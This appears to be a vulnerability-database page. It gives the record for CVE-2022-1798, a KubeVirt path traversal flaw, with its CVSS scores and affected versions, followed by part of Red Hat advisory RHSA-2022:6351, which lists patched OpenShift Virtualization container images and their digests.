Action not permitted
Modal body text goes here.
CVE-2022-1798
Vulnerability from cvelistv5
Published
2022-09-15 15:45
Modified
2024-08-03 00:17
Severity ?
EPSS score ?
Summary
Path Traversal vulnerability in Kubevirt
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve-coordination@google.com | https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364 | Exploit, Mitigation, Patch, Third Party Advisory |
Impacted products
| ▼ | Vendor | Product |
|---|---|---|
| Google LLC | Kubevirt |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T00:17:00.704Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"platforms": [
"all"
],
"product": "Kubevirt",
"vendor": "Google LLC",
"versions": [
{
"lessThan": "0.55.1",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
},
{
"lessThan": "0.56.0",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Oliver Brooks and James Klopchic of NCC Group"
},
{
"lang": "en",
"value": "Diane Dubois and Roman Mohr of Google"
}
],
"descriptions": [
{
"lang": "en",
"value": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20 Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-09-15T15:45:12",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Path Traversal vulnerability in Kubevirt",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@google.com",
"ID": "CVE-2022-1798",
"STATE": "PUBLIC",
"TITLE": "Path Traversal vulnerability in Kubevirt"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Kubevirt",
"version": {
"version_data": [
{
"platform": "all",
"version_affected": "\u003c",
"version_value": "0.55.1"
},
{
"platform": "all",
"version_affected": "\u003c",
"version_value": "0.56.0"
}
]
}
}
]
},
"vendor_name": "Google LLC"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Oliver Brooks and James Klopchic of NCC Group"
},
{
"lang": "eng",
"value": "Diane Dubois and Roman Mohr of Google"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-20 Improper Input Validation"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364",
"refsource": "CONFIRM",
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364"
}
]
},
"source": {
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2022-1798",
"datePublished": "2022-09-15T15:45:12",
"dateReserved": "2022-05-19T00:00:00",
"dateUpdated": "2024-08-03T00:17:00.704Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2022-1798\",\"sourceIdentifier\":\"cve-coordination@google.com\",\"published\":\"2022-09-15T16:15:10.107\",\"lastModified\":\"2022-09-19T18:52:17.383\",\"vulnStatus\":\"Analyzed\",\"descriptions\":[{\"lang\":\"en\",\"value\":\"A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible.\"},{\"lang\":\"es\",\"value\":\"Una vulnerabilidad de salto de ruta en KubeVirt versiones hasta 0.56 (y 0.55.1) en todas las plataformas permite a un usuario capaz de configurar el kubevirt para leer archivos arbitrarios en el sistema de archivos del host que son legibles p\u00fablicamente o que son legibles para UID 107 o GID 107. /proc/self/() no es accesible\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\"},\"exploitabilityScore\":2.0,\"impactScore\":4.0},{\"source\":\"cve-coordination@google.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"HIGH\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\"},\"exploitabilityScore\":2.0,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]},{\"source\":\"cve-coordination@google.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*\",\"versionStartIncluding\":\"0.20.0\",\"versionEndExcluding\":\"0.55.1\",\"matchCriteriaId\":\"E3E349C1-0216-47B4-B160-13C5B99BC633\"}]}]}],\"references\":[{\"url\":\"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364\",\"source\":\"cve-coordination@google.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Patch\",\"Third Party Advisory\"]}]}}"
}
}
rhsa-2022_6351
Vulnerability from csaf_redhat
Published
2022-09-06 14:00
Modified
2024-11-25 08:02
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.10.5 Images security and bug fix update
Notes
Topic
Red Hat OpenShift Virtualization release 4.10.5 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.
This advisory contains the following OpenShift Virtualization 4.10.5 images:
RHEL-8-CNV-4.10
===============
cluster-network-addons-operator-container-v4.10.5-1
kubemacpool-container-v4.10.5-1
virt-cdi-importer-container-v4.10.5-1
hyperconverged-cluster-operator-container-v4.10.5-1
hostpath-provisioner-operator-container-v4.10.5-1
virtio-win-container-v4.10.5-1
virt-cdi-cloner-container-v4.10.5-1
kubevirt-ssp-operator-container-v4.10.5-1
cnv-containernetworking-plugins-container-v4.10.5-1
hyperconverged-cluster-webhook-container-v4.10.5-1
virt-cdi-apiserver-container-v4.10.5-1
ovs-cni-plugin-container-v4.10.5-1
virt-cdi-uploadserver-container-v4.10.5-1
virt-cdi-uploadproxy-container-v4.10.5-1
virt-cdi-controller-container-v4.10.5-1
kubevirt-template-validator-container-v4.10.5-1
virt-cdi-operator-container-v4.10.5-1
hostpath-provisioner-container-v4.10.5-1
hostpath-csi-driver-container-v4.10.5-1
kubernetes-nmstate-handler-container-v4.10.5-1
ovs-cni-marker-container-v4.10.5-1
bridge-marker-container-v4.10.5-1
node-maintenance-operator-container-v4.10.5-1
cnv-must-gather-container-v4.10.5-2
virt-controller-container-v4.10.5-3
virt-api-container-v4.10.5-3
virt-handler-container-v4.10.5-3
virt-operator-container-v4.10.5-3
virt-artifacts-server-container-v4.10.5-3
virt-launcher-container-v4.10.5-3
libguestfs-tools-container-v4.10.5-3
hco-bundle-registry-container-v4.10.5-6
Security Fix(es):
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
* go-restful: Authorization Bypass Through User-Controlled Key (CVE-2022-1996)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Virtualization release 4.10.5 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenShift Virtualization is Red Hat\u0027s virtualization solution designed for Red Hat OpenShift Container Platform.\n\nThis advisory contains the following OpenShift Virtualization 4.10.5 images:\n\nRHEL-8-CNV-4.10\n===============\ncluster-network-addons-operator-container-v4.10.5-1\nkubemacpool-container-v4.10.5-1\nvirt-cdi-importer-container-v4.10.5-1\nhyperconverged-cluster-operator-container-v4.10.5-1\nhostpath-provisioner-operator-container-v4.10.5-1\nvirtio-win-container-v4.10.5-1\nvirt-cdi-cloner-container-v4.10.5-1\nkubevirt-ssp-operator-container-v4.10.5-1\ncnv-containernetworking-plugins-container-v4.10.5-1\nhyperconverged-cluster-webhook-container-v4.10.5-1\nvirt-cdi-apiserver-container-v4.10.5-1\novs-cni-plugin-container-v4.10.5-1\nvirt-cdi-uploadserver-container-v4.10.5-1\nvirt-cdi-uploadproxy-container-v4.10.5-1\nvirt-cdi-controller-container-v4.10.5-1\nkubevirt-template-validator-container-v4.10.5-1\nvirt-cdi-operator-container-v4.10.5-1\nhostpath-provisioner-container-v4.10.5-1\nhostpath-csi-driver-container-v4.10.5-1\nkubernetes-nmstate-handler-container-v4.10.5-1\novs-cni-marker-container-v4.10.5-1\nbridge-marker-container-v4.10.5-1\nnode-maintenance-operator-container-v4.10.5-1\ncnv-must-gather-container-v4.10.5-2\nvirt-controller-container-v4.10.5-3\nvirt-api-container-v4.10.5-3\nvirt-handler-container-v4.10.5-3\nvirt-operator-container-v4.10.5-3\nvirt-artifacts-server-container-v4.10.5-3\nvirt-launcher-container-v4.10.5-3\nlibguestfs-tools-container-v4.10.5-3\nhco-bundle-registry-container-v4.10.5-6\n\nSecurity Fix(es):\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\n* go-restful: Authorization Bypass Through User-Controlled Key (CVE-2022-1996)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2022:6351",
"url": "https://access.redhat.com/errata/RHSA-2022:6351"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2070366",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2070366"
},
{
"category": "external",
"summary": "2094982",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094982"
},
{
"category": "external",
"summary": "2099324",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099324"
},
{
"category": "external",
"summary": "2117872",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872"
},
{
"category": "external",
"summary": "2118367",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2118367"
},
{
"category": "external",
"summary": "2120061",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2120061"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6351.json"
}
],
"title": "Red Hat Security Advisory: OpenShift Virtualization 4.10.5 Images security and bug fix update",
"tracking": {
"current_release_date": "2024-11-25T08:02:28+00:00",
"generator": {
"date": "2024-11-25T08:02:28+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.1"
}
},
"id": "RHSA-2022:6351",
"initial_release_date": "2022-09-06T14:00:38+00:00",
"revision_history": [
{
"date": "2022-09-06T14:00:38+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2022-09-06T14:00:38+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-25T08:02:28+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "CNV 4.10 for RHEL 8",
"product": {
"name": "CNV 4.10 for RHEL 8",
"product_id": "8Base-CNV-4.10",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:container_native_virtualization:4.10::el8"
}
}
}
],
"category": "product_family",
"name": "OpenShift Virtualization"
},
{
"branches": [
{
"category": "product_version",
"name": "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64",
"product": {
"name": "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64",
"product_id": "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/bridge-marker\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64",
"product": {
"name": "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64",
"product_id": "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64",
"product": {
"name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64",
"product_id": "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64",
"product": {
"name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64",
"product_id": "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8\u0026tag=v4.10.5-2"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64",
"product": {
"name": "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64",
"product_id": "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry\u0026tag=v4.10.5-6"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64",
"product": {
"name": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64",
"product_id": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver-rhel8\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64",
"product": {
"name": "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64",
"product_id": "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64",
"product": {
"name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64",
"product_id": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64",
"product": {
"name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64",
"product_id": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64",
"product": {
"name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64",
"product_id": "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64",
"product": {
"name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64",
"product_id": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64",
"product": {
"name": "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64",
"product_id": "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubemacpool\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64",
"product": {
"name": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64",
"product_id": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubernetes-nmstate-handler-rhel8\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64",
"product_id": "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64",
"product_id": "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64",
"product": {
"name": "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64",
"product_id": "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64",
"product_identification_helper": {
"purl": "pkg:oci/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools\u0026tag=v4.10.5-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64",
"product": {
"name": "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64",
"product_id": "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/node-maintenance-operator\u0026tag=v4.10.5-1"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64",
"product": {
"name": "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64",
